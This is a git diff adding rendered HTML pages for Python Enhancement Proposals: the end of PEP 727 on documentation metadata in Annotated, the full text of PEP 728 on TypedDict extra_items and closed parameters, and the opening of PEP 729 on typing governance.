+   /// Says "Hello, [name](Person::name)" to the `Person` it is called on.
+   pub fn hello(& self) {
+      println!("Hello, {}!", self.name);
+   }
+}
+
+fn main() {
+   let john = Person::new("John");
+
+   john.hello();
+}
+
+
+
+
+

Go Lang

+

Go also uses a form of Doc Comments.

+

It doesn’t have a well defined microsyntax structure to denote what documentation +refers to which symbol/parameter, but parameters can be referenced by name without +any special syntax or marker, this also means that ordinary words that could appear +in the documentation text should be avoided as parameter names.

+
package strconv
+
+// Quote returns a double-quoted Go string literal representing s.
+// The returned string uses Go escape sequences (\t, \n, \xFF, \u0100)
+// for control characters and non-printable characters as defined by IsPrint.
+func Quote(s string) string {
+   ...
+}
+
+
+
+
+
+

Rejected Ideas

+
+

Standardize Current Docstrings

+

A possible alternative would be to support and try to push as a standard one of the +existing docstring formats. But that would only solve the standardization.

+

It wouldn’t solve any of the other problems derived from using a microsyntax inside +of a docstring instead of pure Python syntax, the same as described above in +the Rationale - Summary.

+
+
+

Extra Metadata and Decorator

+

Some ideas before this proposal included having a function doc() instead of +the single class Doc with several parameters to indicate whether +an object is discouraged from use, what exceptions it may raise, etc. +To allow also deprecating functions and classes, it was also expected +that doc() could be used as a decorator. But this functionality is covered +by typing.deprecated() in PEP 702, so it was dropped from this proposal.

+

A way to declare additional information could still be useful in the future, +but taking early feedback on this idea, all that was postponed to future +proposals.

+

This also shifted the focus from an all-encompassing function doc() +with multiple parameters to a single Doc class to be used in +Annotated in a way that could be composed with other +future proposals.

+

This design change also allows better interoperability with other proposals +like typing.deprecated(), as in the future it could be considered to +allow having typing.deprecated() also in Annotated to deprecate +individual parameters, coexisting with Doc.

+
+
+

String Under Definition

+

A proposed alternative in the discussion is declaring a string under the definition +of a symbol and providing runtime access to those values:

+
class User:
+    name: str
+    "The user's name"
+    age: int
+    "The user's age"
+
+    ...
+
+
+

This was already proposed and rejected in PEP 224, mainly due to the ambiguity of +how is the string connected with the symbol it’s documenting.

+

Additionally, there would be no way to provide runtime access to this value in previous +versions of Python.

+
+
+

Plain String in Annotated

+

In the discussion, it was also suggested to use a plain string inside of +Annotated:

+
from typing import Annotated
+
+class User:
+    name: Annotated[str, "The user's name"]
+    age: Annotated[int, "The user's age"]
+
+    ...
+
+
+

But this would create a predefined meaning for any plain string inside of +Annotated, and any tool that was using plain strings in them +for any other purpose, which is currently allowed, would now be invalid.

+

Having an explicit typing.Doc makes it compatible with current valid uses of +Annotated.

+
+
+

Another Annotated-Like Type

+

In the discussion it was suggested to define a new type similar to +Annotated, it would take the type and a parameter with the +documentation string:

+
from typing import Doc
+
+class User:
+    name: Doc[str, "The user's name"]
+    age: Doc[int, "The user's age"]
+
+    ...
+
+
+

This idea was rejected as it would only support that use case and would make it more +difficult to combine it with Annotated for other purposes ( +e.g. with FastAPI metadata, Pydantic fields, etc.) or adding additional metadata +apart from the documentation string (e.g. deprecation).

+
+
+

Transferring Documentation from Type aliases

+

A previous version of this proposal specified that when type aliases declared with +Annotated were used, and these type aliases were used in +annotations, the documentation string would be transferred to the annotated symbol.

+

For example:

+
from typing import Annotated, Doc, TypeAlias
+
+
+UserName: TypeAlias = Annotated[str, Doc("The user's name")]
+
+
+def create_user(name: UserName): ...
+
+def delete_user(name: UserName): ...
+
+
+

This was rejected after receiving feedback from the maintainer of one of the main +components used to provide editor support.

+
+
+

Shorthand with Slices

+

In the discussion, it was suggested to use a shorthand with slices:

+
is_approved: Annotated[str: "The status of a PEP."]
+
+
+

Although this is a very clever idea and would remove the need for a new Doc class, +runtime executing of current versions of Python don’t allow it.

+

At runtime, Annotated requires at least two arguments, and it +requires the first argument to be type, it crashes if it is a slice.

+
+
+
+

Open Issues

+
+

Verbosity

+

The main argument against this would be the increased verbosity.

+

If the signature was not viewed independently of the documentation and the body of the +function with the docstring was also measured, the total verbosity would be +somewhat similar, as what this proposal does is to move some of the contents +from the docstring in the body to the signature.

+

Considering the signature alone, without the body, they could be much longer than +they currently are, they could end up being more than one page long. In exchange, +the equivalent docstrings that currently are more than one page long would be +much shorter.

+

When comparing the total verbosity, including the signature and the docstring, +the main additional verbosity added by this would be from using +Annotated and typing.Doc. If Annotated +had more usage, it could make sense to have an improved shorter syntax for it and for +the type of metadata it would carry. But that would only make sense once +Annotated is more widely used.

+

On the other hand, this verbosity would not affect end users as they would not see the +internal code using typing.Doc. The majority of users would interact with +libraries through editors without looking at the internals, and if anything, they +would have tooltips from editors supporting this proposal.

+

The cost of dealing with the additional verbosity would mainly be carried +by those library maintainers that use this feature.

+

This argument could be analogous to the argument against type annotations +in general, as they do indeed increase verbosity, in exchange for their +features. But again, as with type annotations, this would be optional and only +to be used by those that are willing to take the extra verbosity in exchange +for the benefits.

+

Of course, more advanced users might want to look at the source code of the libraries +and if the authors of those libraries adopted this, those advanced users would end up +having to look at that code with additional signature verbosity instead of docstring +verbosity.

+

Any authors that decide not to adopt it should be free to continue using docstrings +with any particular format they decide, no docstrings at all, etc.

+

Still, there’s a high chance that library authors could receive pressure to +adopt this if it became the blessed solution.

+
+
+

Documentation is not Typing

+

It could also be argued that documentation is not really part of typing, or that +it should live in a different module. Or that this information should not be part +of the signature but live in another place (like the docstring).

+

Nevertheless, type annotations in Python could already be considered, by default, +additional metadata: they carry additional information about variables, +parameters, return types, and by default they don’t have any runtime behavior. And +this proposal would add one more type of metadata to them.

+

It could be argued that this proposal extends the type of information that +type annotations carry, the same way as PEP 702 extends them to include +deprecation information.

+

Annotated was added to the standard library precisely to +support adding additional metadata to the annotations, and as the new proposed +Doc class is tightly coupled to Annotated, it makes +sense for it to live in the same module. If Annotated was moved +to another module, it would make sense to move Doc with it.

+
+
+

Multiple Standards

+

Another argument against this would be that it would create another standard, +and that there are already several conventions for docstrings. It could +seem better to formalize one of the currently existing standards.

+

Nevertheless, as stated above, none of those conventions cover the general +drawbacks of a doctsring-based approach that this proposal solves naturally.

+

To see a list of the drawbacks of a docstring-based approach, see the section above +in the Rationale - Summary.

+

In the same way, it can be seen that, in many cases, a new standard that +takes advantage of new features and solves several problems from previous +methods can be worth having. As is the case with the new pyproject.toml, +dataclass_transform, the new typing pipe/union (|) operator, and other cases.

+
+
+

Adoption

+

As this is a new standard proposal, it would only make sense if it had +interest from the community.

+

Fortunately there’s already interest from several mainstream libraries +from several developers and teams, including FastAPI, Typer, SQLModel, +Asyncer (from the author of this proposal), Pydantic, Strawberry (GraphQL), and +others.

+

There’s also interest and support from documentation tools, like +mkdocstrings, which added +support even for an earlier version of this proposal.

+

All the CPython core developers contacted for early feedback (at least 4) have +shown interest and support for this proposal.

+

Editor developers (VS Code and PyCharm) have shown some interest, while showing +concerns about the signature verbosity of the proposal, although not about the +implementation (which is what would affect them the most). And they have shown +they would consider adding support for this if it were to become an +official standard. In that case, they would only need to add support for +rendering, as support for editing, which is normally non-existing for +other standards, is already there, as they already support editing standard +Python syntax.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0727.rst

+

Last modified: 2023-12-11 23:21:54 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0728/index.html b/pep-0728/index.html new file mode 100644 index 00000000000..4d15b08ee1a --- /dev/null +++ b/pep-0728/index.html @@ -0,0 +1,937 @@ + + + + + + + + PEP 728 – TypedDict with Typed Extra Items | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 728 – TypedDict with Typed Extra Items

+
+
Author:
+
Zixuan James Li <p359101898 at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
12-Sep-2023
+
Python-Version:
+
3.14
+
Post-History:
+
09-Feb-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds two class parameters, closed and extra_items +to type the extra items on a TypedDict. This addresses the +need to define closed TypedDict types or to type a subset of keys that might +appear in a dict while permitting additional items of a specified type.

+
+
+

Motivation

+

A typing.TypedDict type can annotate the value type of each known +item in a dictionary. However, due to structural +assignability, a TypedDict can have extra items +that are not visible through its type. There is currently no way to restrict +the types of items that might be present in the TypedDict type’s +consistent subtypes.

+
+

Disallowing Extra Items Explicitly

+

The current behavior of TypedDict prevents users from defining a +TypedDict type when it is expected that the type contains no extra items.

+

Due to the possible presence of extra items, type checkers cannot infer more +precise return types for .items() and .values() on a TypedDict. This can +also be resolved by +defining a closed TypedDict type.

+

Another possible use case for this is a sound way to +enable type narrowing with the +in check:

+
class Movie(TypedDict):
+    name: str
+    director: str
+
+class Book(TypedDict):
+    name: str
+    author: str
+
+def fun(entry: Movie | Book) -> None:
+    if "author" in entry:
+        reveal_type(entry)  # Revealed type is still 'Movie | Book'
+
+
+

Nothing prevents a dict that is assignable with Movie to have the +author key, and under the current specification it would be incorrect for +the type checker to narrow its type.

+
+
+

Allowing Extra Items of a Certain Type

+

For supporting API interfaces or legacy codebase where only a subset of possible +keys are known, it would be useful to explicitly specify extra items of certain +value types.

+

However, the typing spec is more restrictive when checking the construction of a +TypedDict, preventing users +from doing this:

+
class MovieBase(TypedDict):
+    name: str
+
+def foo(movie: MovieBase) -> None:
+    # movie can have extra items that are not visible through MovieBase
+    ...
+
+movie: MovieBase = {"name": "Blade Runner", "year": 1982}  # Not OK
+foo({"name": "Blade Runner", "year": 1982})  # Not OK
+
+
+

While the restriction is enforced when constructing a TypedDict, due to +structural assignability, the +TypedDict may have extra items that are not visible through its type. +For example:

+
class Movie(MovieBase):
+    year: int
+
+movie: Movie = {"name": "Blade Runner", "year": 1982}
+foo(movie)  # OK
+
+
+

It is not possible to acknowledge the existence of the extra items through +in checks and access them without breaking type safety, even though they +might exist from some consistent subtypes of +MovieBase:

+
def bar(movie: MovieBase) -> None:
+    if "year" in movie:
+        reveal_type(movie["year"])  # Error: TypedDict 'MovieBase' has no key 'year'
+
+
+

Some workarounds have already been implemented to allow +extra items, but none of them is ideal. For mypy, +--disable-error-code=typeddict-unknown-key +suppresses type checking error +specifically for unknown keys on TypedDict. This sacrifices type safety over +flexibility, and it does not offer a way to specify that the TypedDict type +expects additional keys whose value types are assignable with a certain type.

+
+
+

Support Additional Keys for Unpack

+

PEP 692 adds a way to precisely annotate the types of individual keyword +arguments represented by **kwargs using TypedDict with Unpack. However, +because TypedDict cannot be defined to accept arbitrary extra items, it is not +possible to allow additional keyword arguments +that are not known at the time the TypedDict is defined.

+

Given the usage of pre-PEP 692 type annotation for **kwargs in existing +codebases, it will be valuable to accept and type extra items on TypedDict so +that the old typing behavior can be supported in combination with Unpack.

+
+
+
+

Rationale

+

A type that allows extra items of type str on a TypedDict can be loosely +described as the intersection between the TypedDict and Mapping[str, str].

+

Index Signatures +in TypeScript achieve this:

+
type Foo = {
+    a: string
+    [key: string]: string
+}
+
+
+

This proposal aims to support a similar feature without introducing general +intersection of types or syntax changes, offering a natural extension to the +existing assignability rules.

+

We propose to add a class parameter extra_items to TypedDict. +It accepts a type expression as the argument; when it is present, +extra items are allowed, and their value types must be assignable to the +type expression value.

+

An application of this is to disallow extra items. We propose to add a +closed class parameter, which only accepts a literal True or False +as the argument. It should be a runtime error when closed and +extra_items are used at the same time.

+

Different from index signatures, the types of the known items do not need to be +assignable to the extra_items argument.

+

There are some advantages to this approach:

+
    +
  • We can build on top of the assignability rules defined in the typing spec, +where extra_items can be treated as a pseudo-item.
  • +
  • There is no need to introduce a grammar change to specify the type of the +extra items.
  • +
  • We can precisely type the extra items without requiring the value types of the +known items to be assignable to extra_items.
  • +
  • We do not lose backwards compatibility as both extra_items and closed +are opt-in only features.
  • +
+
+
+

Specification

+

This specification is structured to parallel PEP 589 to highlight changes to +the original TypedDict specification.

+

If extra_items is specified, extra items are treated as non-required +items matching the extra_items argument, whose keys are allowed when +determining supported and unsupported operations.

+
+

The extra_items Class Parameter

+

For a TypedDict type that specifies extra_items, during construction, the +value type of each unknown item is expected to be non-required and assignable +to the extra_items argument. For example:

+
class Movie(TypedDict, extra_items=bool):
+    name: str
+
+a: Movie = {"name": "Blade Runner", "novel_adaptation": True}  # OK
+b: Movie = {
+    "name": "Blade Runner",
+    "year": 1982,  # Not OK. 'int' is not assignable to 'bool'
+}
+
+
+

Here, extra_items=bool specifies that items other than 'name' +have a value type of bool and are non-required.

+

The alternative inline syntax is also supported:

+
Movie = TypedDict("Movie", {"name": str}, extra_items=bool)
+
+
+

Accessing extra items is allowed. Type checkers must infer their value type from +the extra_items argument:

+
def f(movie: Movie) -> None:
+    reveal_type(movie["name"])              # Revealed type is 'str'
+    reveal_type(movie["novel_adaptation"])  # Revealed type is 'bool'
+
+
+

extra_items is inherited through subclassing:

+
class MovieBase(TypedDict, extra_items=int | None):
+    name: str
+
+class Movie(MovieBase):
+    year: int
+
+a: Movie = {"name": "Blade Runner", "year": None}  # Not OK. 'None' is incompatible with 'int'
+b: Movie = {
+    "name": "Blade Runner",
+    "year": 1982,
+    "other_extra_key": None,
+}  # OK
+
+
+

Here, 'year' in a is an extra key defined on Movie whose value type +is int. 'other_extra_key' in b is another extra key whose value type +must be assignable to the value of extra_items defined on MovieBase.

+
+
+

The closed Class Parameter

+

When closed=True is set, no extra items are allowed. This is a shorthand for +extra_items=Never, because there can’t be a value type that is assignable to +Never.

+

Similar to total, only a literal True or False is supported as the +value of the closed argument; closed is False by default, which +preserves the previous TypedDict behavior.

+

The value of closed is not inherited through subclassing, but the +implicitly set extra_items=Never is. It should be an error to use the +default closed=False when subclassing a closed TypedDict type:

+
class BaseMovie(TypedDict, closed=True):
+    name: str
+
+class MovieA(BaseMovie):  # Not OK. An explicit 'closed=True' is required
+    pass
+
+class MovieB(BaseMovie, closed=True):  # OK
+    pass
+
+
+

Setting both closed and extra_items when defining a TypedDict type +should always be a runtime error:

+
class Person(TypedDict, closed=False, extra_items=bool):  # Not OK. 'closed' and 'extra_items' are incompatible
+    name: str
+
+
+

As a consequence of closed=True being equivalent to extra_items=Never. +The same rules that apply to extra_items=Never should also apply to +closed=True. It is possible to use closed=True when subclassing if the +extra_items argument is a read-only type:

+
class Movie(TypedDict, extra_items=ReadOnly[str]):
+    pass
+
+class MovieClosed(Movie, closed=True):  # OK
+    pass
+
+class MovieNever(Movie, extra_items=Never):  # Not OK. 'closed=True' is preferred
+    pass
+
+
+

This will be further discussed in +a later section.

+

When neither extra_items nor closed=True is specified, the TypedDict +is assumed to allow non-required extra items of value type ReadOnly[object] +during inheritance or assignability checks. This preserves the existing behavior +of TypedDict.

+
+
+

Interaction with Totality

+

It is an error to use Required[] or NotRequired[] with extra_items. +total=False and total=True have no effect on extra_items itself.

+

The extra items are non-required, regardless of the totality of the +TypedDict. Operations +that are available to NotRequired items should also be available to the +extra items:

+
class Movie(TypedDict, extra_items=int):
+    name: str
+
+def f(movie: Movie) -> None:
+    del movie["name"]  # Not OK. The value type of 'name' is 'Required[int]'
+    del movie["year"]  # OK. The value type of 'year' is 'NotRequired[int]'
+
+
+
+
+

Interaction with Unpack

+

For type checking purposes, Unpack[SomeTypedDict] with extra items should be +treated as its equivalent in regular parameters, and the existing rules for +function parameters still apply:

+
class Movie(TypedDict, extra_items=int):
+    name: str
+
+def f(**kwargs: Unpack[Movie]) -> None: ...
+
+# Should be equivalent to:
+def f(*, name: str, **kwargs: int) -> None: ...
+
+
+
+
+

Interaction with Read-only Items

+

When the extra_items argument is annotated with the ReadOnly[] +type qualifier, the extra items on the TypedDict have the +properties of read-only items. This interacts with inheritance rules specified +in Read-only Items.

+

Notably, if the TypedDict type specifies extra_items to be read-only, +subclasses of the TypedDict type may redeclare extra_items.

+

Because a non-closed TypedDict type implicitly allows non-required extra items +of value type ReadOnly[object], its subclass can override the +extra_items argument with more specific types.

+

More details are discussed in the later sections.

+
+
+

Inheritance

+

extra_items is inherited in a similar way as a regular key: value_type +item. As with the other keys, the inheritance rules +and Read-only Items inheritance rules apply.

+

We need to reinterpret these rules to define how extra_items interacts with +them.

+
+
    +
  • Changing a field type of a parent TypedDict class in a subclass is not allowed.
  • +
+
+

First, it is not allowed to change the value of extra_items in a subclass +unless it is declared to be ReadOnly in the superclass:

+
class Parent(TypedDict, extra_items=int | None):
+    pass
+
+class Child(Parent, extra_items=int): # Not OK. Like any other TypedDict item, extra_items's type cannot be changed
+
+
+

Second, extra_items=T effectively defines the value type of any unnamed +items accepted to the TypedDict and marks them as non-required. Thus, the above +restriction applies to any additional items defined in a subclass. For each item +added in a subclass, all of the following conditions should apply:

+
    +
  • If extra_items is read-only
      +
    • The item can be either required or non-required
    • +
    • The item’s value type is assignable to T
    • +
    +
  • +
  • If extra_items is not read-only
      +
    • The item is non-required
    • +
    • The item’s value type is consistent with T
    • +
    +
  • +
  • If extra_items is not overriden, the subclass inherits it as-is.
  • +
+

For example:

+
class MovieBase(TypedDict, extra_items=int | None):
+    name: str
+
+class AdaptedMovie(MovieBase):  # Not OK. 'bool' is not assignable to 'int | None'
+    adapted_from_novel: bool
+
+class MovieRequiredYear(MovieBase):  # Not OK. Required key 'year' is not known to 'Parent'
+    year: int | None
+
+class MovieNotRequiredYear(MovieBase):  # Not OK. 'int | None' is not assignable to 'int'
+    year: NotRequired[int]
+
+class MovieWithYear(MovieBase):  # OK
+    year: NotRequired[int | None]
+
+class BookBase(TypedDict, extra_items=ReadOnly[int | str]):
+    title: str
+
+class Book(BookBase, extra_items=str):  # OK
+    year: int  # OK
+
+
+

An important side effect of the inheritance rules is that we can define a +TypedDict type that disallows additional items:

+
class MovieClosed(TypedDict, extra_items=Never):
+    name: str
+
+
+

Here, passing the value Never to extra_items specifies that +there can be no other keys in MovieFinal other than the known ones. +Because of its potential common use, there is a preferred alternative:

+
class MovieClosed(TypedDict, closed=True):
+    name: str
+
+
+

where we implicitly assume that extra_items=Never.

+
+
+

Assignability

+

Let S be the set of keys of the explicitly defined items on a TypedDict +type. If it specifies extra_items=T, the TypedDict type is considered to +have an infinite set of items that all satisfy the following conditions.

+
    +
  • If extra_items is read-only:
      +
    • The key’s value type is assignable to T.
    • +
    • The key is not in S.
    • +
    +
  • +
  • If extra_items is not read-only:
      +
    • The key is non-required.
    • +
    • The key’s value type is consistent with T.
    • +
    • The key is not in S.
    • +
    +
  • +
+

For type checking purposes, let extra_items be a non-required pseudo-item +when checking for assignability according to rules defined in the +Read-only Items section, with a new rule added in bold +text as follows:

+
+
A TypedDict type B is assignable to a TypedDict type +A if B is structurally assignable to +A. This is true if and only if all of the following are satisfied:
    +
  • [If no key with the same name can be found in ``B``, the ‘extra_items’ +argument is considered the value type of the corresponding key.]
  • +
  • For each item in A, B has the corresponding key, unless the item in +A is read-only, not required, and of top value type +(ReadOnly[NotRequired[object]]).
  • +
  • For each item in A, if B has the corresponding key, the corresponding +value type in B is assignable to the value type in A.
  • +
  • For each non-read-only item in A, its value type is assignable to the +corresponding value type in B, and the corresponding key is not read-only +in B.
  • +
  • For each required key in A, the corresponding key is required in B.
  • +
  • For each non-required key in A, if the item is not read-only in A, +the corresponding key is not required in B.
  • +
+
+

The following examples illustrate these checks in action.

+

extra_items puts various restrictions on additional items for assignability +checks:

+
class Movie(TypedDict, extra_items=int | None):
+    name: str
+
+class MovieDetails(TypedDict, extra_items=int | None):
+    name: str
+    year: NotRequired[int]
+
+details: MovieDetails = {"name": "Kill Bill Vol. 1", "year": 2003}
+movie: Movie = details  # Not OK. While 'int' is assignable to 'int | None',
+                        # 'int | None' is not assignable to 'int'
+
+class MovieWithYear(TypedDict, extra_items=int | None):
+    name: str
+    year: int | None
+
+details: MovieWithYear = {"name": "Kill Bill Vol. 1", "year": 2003}
+movie: Movie = details  # Not OK. 'year' is not required in 'Movie',
+                        # so it shouldn't be required in 'MovieWithYear' either
+
+
+

Because 'year' is absent in Movie, extra_items is considered the +corresponding key. 'year' being required violates this rule:

+
+
    +
  • For each required key in A, the corresponding key is required in B.
  • +
+
+

When extra_items is specified to be read-only on a TypedDict type, it is +possible for an item to have a narrower type than the +extra_items argument:

+
class Movie(TypedDict, extra_items=ReadOnly[str | int]):
+    name: str
+
+class MovieDetails(TypedDict, extra_items=int):
+    name: str
+    year: NotRequired[int]
+
+details: MovieDetails = {"name": "Kill Bill Vol. 2", "year": 2004}
+movie: Movie = details  # OK. 'int' is assignable to 'str | int'.
+
+
+

This behaves the same way as if year: ReadOnly[str | int] is an item +explicitly defined in Movie.

+

extra_items as a pseudo-item follows the same rules that other items have, +so when both TypedDicts types specify extra_items, this check is naturally +enforced:

+
class MovieExtraInt(TypedDict, extra_items=int):
+    name: str
+
+class MovieExtraStr(TypedDict, extra_items=str):
+    name: str
+
+extra_int: MovieExtraInt = {"name": "No Country for Old Men", "year": 2007}
+extra_str: MovieExtraStr = {"name": "No Country for Old Men", "description": ""}
+extra_int = extra_str  # Not OK. 'str' is not assignable to extra items type 'int'
+extra_str = extra_int  # Not OK. 'int' is not assignable to extra items type 'str'
+
+
+

A non-closed TypedDict type implicitly allows non-required extra keys of value +type ReadOnly[object]. Applying the assignability rules between this type +and a closed TypedDict type is allowed:

+
class MovieNotClosed(TypedDict):
+    name: str
+
+extra_int: MovieExtraInt = {"name": "No Country for Old Men", "year": 2007}
+not_closed: MovieNotClosed = {"name": "No Country for Old Men"}
+extra_int = not_closed  # Not OK.
+                        # 'extra_items=ReadOnly[object]' implicitly on 'MovieNotClosed'
+                        # is not assignable to with 'extra_items=int'
+not_closed = extra_int  # OK
+
+
+
+
+

Interaction with Constructors

+

TypedDicts that allow extra items of type T also allow arbitrary keyword +arguments of this type when constructed by calling the class object:

+
class NonClosedMovie(TypedDict):
+    name: str
+
+NonClosedMovie(name="No Country for Old Men")  # OK
+NonClosedMovie(name="No Country for Old Men", year=2007)  # Not OK. Unrecognized item
+
+class ExtraMovie(TypedDict, extra_items=int):
+    name: str
+
+ExtraMovie(name="No Country for Old Men")  # OK
+ExtraMovie(name="No Country for Old Men", year=2007)  # OK
+ExtraMovie(
+    name="No Country for Old Men",
+    language="English",
+)  # Not OK. Wrong type for extra item 'language'
+
+# This implies 'extra_items=Never',
+# so extra keyword arguments would produce an error
+class ClosedMovie(TypedDict, closed=True):
+    name: str
+
+ClosedMovie(name="No Country for Old Men")  # OK
+ClosedMovie(
+    name="No Country for Old Men",
+    year=2007,
+)  # Not OK. Extra items not allowed
+
+
+
+
+

Interaction with Mapping[KT, VT]

+

A TypedDict type can be assignable to Mapping[KT, VT] types other than +Mapping[str, object] as long as all value types of the items on the +TypedDict type is assignable to VT. This is an extension of this +assignability rule from the typing spec:

+
+
    +
  • A TypedDict with all int values is not assignable to +Mapping[str, int], since there may be additional non-int values +not visible through the type, due to structural +assignability. These can be accessed using the values() and +items() methods in Mapping,
  • +
+
+

For example:

+
class MovieExtraStr(TypedDict, extra_items=str):
+    name: str
+
+extra_str: MovieExtraStr = {"name": "Blade Runner", "summary": ""}
+str_mapping: Mapping[str, str] = extra_str  # OK
+
+int_mapping: Mapping[str, int] = extra_int  # Not OK. 'int | str' is not assignable with 'int'
+int_str_mapping: Mapping[str, int | str] = extra_int  # OK
+
+
+

Type checkers should be able to infer the precise return types of values() +and items() on such TypedDict types:

+
def fun(movie: MovieExtraStr) -> None:
+    reveal_type(movie.items())  # Revealed type is 'dict_items[str, str]'
+    reveal_type(movie.values())  # Revealed type is 'dict_values[str, str]'
+
+
+
+
+

Interaction with dict[KT, VT]

+

Note that because the presence of extra_items on a closed TypedDict type +prohibits additional required keys in its structural +typing:subtypes, we can determine if the TypedDict type and +its structural subtypes will ever have any required key during static analysis.

+

The TypedDict type is assignable to dict[str, VT] if all +items on the TypedDict type satisfy the following conditions:

+
    +
  • The value type of the item is consistent with VT.
  • +
  • The item is not read-only.
  • +
  • The item is not required.
  • +
+

For example:

+
class IntDict(TypedDict, extra_items=int):
+    pass
+
+class IntDictWithNum(IntDict):
+    num: NotRequired[int]
+
+def f(x: IntDict) -> None:
+    v: dict[str, int] = x  # OK
+    v.clear()  # OK
+
+not_required_num_dict: IntDictWithNum = {"num": 1, "bar": 2}
+regular_dict: dict[str, int] = not_required_num_dict  # OK
+f(not_required_num_dict)  # OK
+
+
+

In this case, methods that are previously unavailable on a TypedDict are allowed:

+
not_required_num.clear()  # OK
+
+reveal_type(not_required_num.popitem())  # OK. Revealed type is tuple[str, int]
+
+
+

However, dict[str, VT] is not necessarily assignable to a TypedDict type, +because such dict can be a subtype of dict:

+
class CustomDict(dict[str, int]):
+    pass
+
+not_a_regular_dict: CustomDict = {"num": 1}
+int_dict: IntDict = not_a_regular_dict  # Not OK
+
+
+
+
+
+

How to Teach This

+

The choice of the spelling "extra_items" is intended to make this +feature more understandable to new users compared to shorter alternatives like +"extra".

+

Details of this should be documented in both the typing spec and the +typing documentation.

+
+
+

Backwards Compatibility

+

Because extra_items is an opt-in feature, no existing codebase will break +due to this change.

+

Note that closed and extra_items as keyword arguments do not collide +with othere keys when using something like +TD = TypedDict("TD", foo=str, bar=int), because this syntax has already +been removed in Python 3.13.

+

Because this is a type-checking feature, it can be made available to older +versions as long as the type checker supports it.

+
+
+

Open Issues

+
+

Use a Special __extra_items__ Key with the closed Class Parameter

+

In an earlier revision of this proposal, we discussed an approach that would +utilize __extra_items__’s value type to specify the type of extra items +accepted, like so:

+
class IntDict(TypedDict, closed=True):
+    __extra_items__: int
+
+
+

where closed=True is required for __extra_items__ to be treated +specially, to avoid key collision.

+

Some members of the community concern about the elegance of the syntax. +Practiaclly, the key collision with a regular key can be mitigated with +workarounds, but since using a reserved key is central to this proposal, +there are limited ways forward to address the concerns.

+
+
+

Support a New Syntax of Specifying Keys

+

By introducing a new syntax that allows specifying string keys, we could +deprecate the functional syntax of defining TypedDict types and address the +key conflict issues if we decide to reserve a special key to type extra items.

+

For example:

+
class Foo(TypedDict):
+    name: str  # Regular item
+    _: bool    # Type of extra items
+    __items__ = {
+        "_": int,   # Literal "_" as a key
+        "class": str,  # Keyword as a key
+        "tricky.name?": float,  # Arbitrary str key
+    }
+
+
+

This was proposed here by Jukka. +The '_' key is chosen for not needing to invent a new name, and its +similarity with the match statement.

+

This will allow us to deprecate the functional syntax of defining TypedDict +types altogether, but there are some disadvantages. For example:

+
    +
  • It’s less apparent to a reader that _: bool makes the TypedDict +special, relative to adding a class argument like extra_items=bool.
  • +
  • It’s backwards incompatible with existing TypedDicts using the +_: bool key. While such users have a way to get around the issue, +it’s still a problem for them if they upgrade Python (or +typing-extensions).
  • +
  • The types don’t appear in an annotation context, so their evaluation will +not be deferred.
  • +
+
+
+
+

Rejected Ideas

+
+

Allowing Extra Items without Specifying the Type

+

extra=True was originally proposed for defining a TypedDict that accepts +extra items regardless of the type, like how total=True works:

+
class ExtraDict(TypedDict, extra=True):
+    pass
+
+
+

Because it did not offer a way to specify the type of the extra items, the type +checkers will need to assume that the type of the extra items is Any, which +compromises type safety. Furthermore, the current behavior of TypedDict already +allows untyped extra items to be present in runtime, due to +structural assignability. +closed=True plays a similar role in the current proposal.

+
+
+

Support Extra Items with Intersection

+

Supporting intersections in Python’s type system requires a lot of careful +consideration, and it can take a long time for the community to reach a +consensus on a reasonable design.

+

Ideally, extra items in TypedDict should not be blocked by work on +intersections, nor does it necessarily need to be supported through +intersections.

+

Moreover, the intersection between Mapping[...] and TypedDict is not +equivalent to a TypedDict type with the proposed extra_items special +item, as the value type of all known items in TypedDict needs to satisfy the +is-subtype-of relation with the value type of Mapping[...].

+
+
+

Requiring Type Compatibility of the Known Items with extra_items

+

extra_items restricts the value type for keys that are unknown to the +TypedDict type. So the value type of any known item is not necessarily +assignable to extra_items, and extra_items is +not necessarily assignable to the value types of all known items.

+

This differs from TypeScript’s Index Signatures +syntax, which requires all properties’ types to match the string index’s type. +For example:

+
interface MovieWithExtraNumber {
+    name: string // Property 'name' of type 'string' is not assignable to 'string' index type 'number'.
+    [index: string]: number
+}
+
+interface MovieWithExtraNumberOrString {
+    name: string // OK
+    [index: string]: number | string
+}
+
+
+

This is a known limitation discussed in TypeScript’s issue tracker, +where it is suggested that there should be a way to exclude the defined keys +from the index signature so that it is possible to define a type like +MovieWithExtraNumber.

+
+
+
+

Reference Implementation

+

An earlier revision of proposal is supported in pyright 1.1.352, and pyanalyze +0.12.0.

+
+
+

Acknowledgments

+

Thanks to Jelle Zijlstra for sponsoring this PEP and providing review feedback, +Eric Traut who proposed the original design +this PEP iterates on, and Alice Purcell for offering their perspective as the +author of PEP 705.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0728.rst

+

Last modified: 2024-10-19 02:14:30 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0729/index.html b/pep-0729/index.html new file mode 100644 index 00000000000..d0bf5136fa7 --- /dev/null +++ b/pep-0729/index.html @@ -0,0 +1,592 @@ + + + + + + + + PEP 729 – Typing governance process | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 729 – Typing governance process

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>, Shantanu Jain <hauntsaninja at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance, Typing
+
Created:
+
19-Sep-2023
+
Post-History:
+
04-Oct-2023, +20-Sep-2023
+
Resolution:
+
20-Nov-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new way to govern the Python type system: a council that is responsible +for maintaining and developing the Python type system. The council will maintain a +specification and conformance test suite and will initially be appointed by the Python Steering Council.

+
+
+

Motivation
